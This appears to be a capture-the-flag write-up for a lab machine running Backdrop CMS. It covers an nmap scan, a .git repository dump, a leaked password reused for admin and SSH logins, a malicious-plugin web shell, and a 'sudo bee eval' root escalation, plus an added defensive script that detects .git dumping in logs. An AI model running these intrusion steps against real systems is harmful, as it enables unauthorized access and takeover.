Dog
Port Scan
nmap -sV -A -T4 -p- [Link] -o port_scan
Starting Nmap 7.95 ( [Link] ) at 2025-03-09 15:26 CET
Nmap scan report for [Link]
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 [Link] (RSA)
| 256 [Link] (ECDSA)
|_ 256 [Link] (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Home | Dog
| http-git:
| [Link]:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:[Link]
|_http-generator: Backdrop CMS 1 ([Link]
| [Link]: 22 disallowed entries (15 shown)
| /core/ /profiles/ /[Link] /[Link] /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at [Link] .
Nmap done: 1 IP address (1 host up) scanned in 625.89 seconds
Foothold
The Nmap scan found an exposed .git repository:
With Git-Dumper we can clone the repository:
From [Link] we found a DB password: BackDropJ2024DS2024
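Added example, not part of the original write-up: on the defender's side, a repository clone like the one above appears in the Apache access log as many successful requests under /.git/. This Python sketch classifies clients by how much of the repository they were served; the log lines, addresses and the threshold of 5 files are constructed assumptions.

```python
import re
from collections import defaultdict

# Apache access log (common/combined format): client, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# A path segment named exactly ".git", including a URL-encoded dot (%2e).
GIT_RE = re.compile(r'/(?:\.|%2e)git(?:/|$)', re.IGNORECASE)

def classify_git_access(lines, dump_threshold=5):
    """Map each client that requested .git paths to a verdict:
    "blocked" (nothing served), "probe" (a few files served) or
    "dump" (at least dump_threshold distinct repository files served)."""
    served = defaultdict(set)   # ip -> distinct .git paths answered with 200
    seen = set()                # every ip that requested a .git path
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if not GIT_RE.search(path):
            continue
        seen.add(m["ip"])
        if m["status"] == "200":
            served[m["ip"]].add(path)
    verdicts = {}
    for ip in seen:
        n = len(served[ip])
        verdicts[ip] = "blocked" if n == 0 else "dump" if n >= dump_threshold else "probe"
    return verdicts

# Constructed sample lines using documentation addresses, not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2025:10:00:01 +0000] "GET /.git/HEAD HTTP/1.1" 200 23
198.51.100.7 - - [01/Jan/2025:10:00:01 +0000] "GET /.git/config HTTP/1.1" 200 92
198.51.100.7 - - [01/Jan/2025:10:00:02 +0000] "GET /.git/index HTTP/1.1" 200 34466
198.51.100.7 - - [01/Jan/2025:10:00:02 +0000] "GET /.git/refs/heads/master HTTP/1.1" 200 41
198.51.100.7 - - [01/Jan/2025:10:00:03 +0000] "GET /.git/objects/ab/cdef0123 HTTP/1.1" 200 512
203.0.113.9 - - [01/Jan/2025:11:15:40 +0000] "GET /.git/HEAD HTTP/1.1" 200 23
192.0.2.44 - - [01/Jan/2025:12:30:09 +0000] "GET /.git/config HTTP/1.1" 403 199
192.0.2.50 - - [01/Jan/2025:12:31:00 +0000] "GET /index.php HTTP/1.1" 200 5120
""".splitlines()

if __name__ == "__main__":
    for ip, verdict in sorted(classify_git_access(SAMPLE_LOG).items()):
        print(ip, verdict)
```

Any "probe" or "dump" verdict means the server is handing out repository files, so every secret in the repository and its history should be rotated and the path denied at the web server.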
In /dump/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active of the dumped directory:
Use these credentials to log in on [Link]:
tiffany@[Link]:BackDropJ2024DS2024
We are able to log in to the admin panel:
With this exploit from ExploitDB we are able to craft a malicious plugin to gain RCE:
Now we can reach the shell through: [Link]
cmd=whoami
Read the content of /etc/passwd:
ssh johncusack@[Link]:BackDropJ2024DS2024
We can run /usr/bin/bee with sudo:
sudo bee --root=/var/www/html eval 'system("/bin/bash");'